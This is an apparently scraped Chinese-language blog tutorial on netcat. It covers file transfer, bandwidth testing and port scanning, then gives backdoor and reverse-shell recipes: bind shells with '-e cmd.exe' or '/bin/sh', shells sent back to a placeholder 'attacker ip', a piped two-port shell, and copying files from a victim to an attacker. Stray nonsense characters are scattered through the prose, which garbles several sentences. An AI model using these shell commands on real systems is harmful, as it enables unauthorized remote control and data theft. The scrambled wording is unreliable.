NetCat使用介绍

NetCat使用介绍,第1张

NetCat号称网络工具中的瑞士军刀,可以用它来做很多有如兆用事情,比如侦听端口、端口扫描、传输文件、网络测速等等

机器IP:118.178.255.158

机器IP:47.96.151.115

可以用这个和妹子聊天,比阅后即焚更安全!

监听UDP端口

-w2 设置2秒超时时间

测试下来,nc传文件与scp传雹销文件速度无差别,用tcpdump查看数据包个数也差不多,nc传输文件比scp好在不需要输入密码.

测试网速原理就是采用文件传输方式,把来自一台机器的/dev/zero一直发送给另外一台的机器的/dev/null,这样测试网速因为不需要写磁盘会更精确.

接收端

发送端

在接收端测试网速

阿里云测试机网速峰值为5Mbps,换算一下 5*1024/8 =640KB/s,与测试结果的recv相差不大,说明阿里云没有骗人。

受控端

控制端

这是否就意味我没有远程机的root账号而能做源橡游很多事了?

最近在做取证相关工作,头大~

其键猜中用的比较多的命令为netcat

可以直接通过起一个端口传文件,只需要在传输双方安装netcat工具即可李宴

netcat命令 参考文章 https://zhuanlan.zhihu.com/p/83959309

起一个监听端口

服务端向客户端发送文件

需稿扰型要开放对应防火墙的权限

NC(netcat)的使用方法!

连接到某处:nc [-options] hostname port[s] [ports].....

监听某端口等待连接:nc -l -p port [options] [hostname] [port] -options

-d 后台运行

-e prog 程序重定向,一旦有连接,就执行绑定的程序。

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h 帮助信息

-i 设定延时时间。

-l 监听方式,等待连入。连接完成后,结束监听。

-L 监听方式,等悔纯滑待连入。连接完成后,继续监听。

-n 只能使用ip地址。

-o file 指定要传送的16进制代码。

-p port 指定本地的端口号。

-r 随意指定本地或远程端口号。

-s addr 本地的源地址。

-t 回显telnet信息。

-u UDP方式。

-v 显示详细的信息,-vv 可获取更详细的信息。

-w 指定超时的时间。

-z 用于scan。

以上就是nc的一些参数和选项,注意,这是nt版本的nc。如果是*nix的需要自己编译。也都差不多,只是netcat.c默认是没有-t和-e这个两个参数裤行,要改。

看看它能干些什么,(偶就知道这些)

1.端口的刺探:

nc -vv ip port

2.扫描器

nc -v -w 5 ip port-port

nc -v -z ip port-port

3. 后门

victim machine:

nc -l -p port -e cmd.exe

nc -l -p port -e /bin/sh

attacker machine:

nc victim ip -p port

得到一个shell。

4.反向连接

attacker machine:

nc -vv -l -p port

victim machine:

nc -e cmd.exe attacker ip -p port

nc -e /bin/sh attacker ip -p port

或者:

attacker machine:

nc -vv -l -p port1 /*用于输入*/

nc -vv -l -p prot2 /*用于显示*/

victim machine:

nc attacker ip port1 | cmd.exe | nc attacker ip port2

nc attacker ip port1 | /bin/sh | nc attacker ip port2

5.传送文件:

attacker machine <-- victim machine

nc -d -l -p port <path file  /*attacker machine*/

nc -vv attacker ip -p port >path file /*victim machine*/

attacker machine -->victim machine

nc -vv -l -p >patm file/*victim machine*/

nc -d victim ip -p port <path file  碧腊 /*attacker machine*/


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/tougao/12152749.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-21
下一篇 2023-05-21

发表评论

登录后才能评论

评论列表(0条)

保存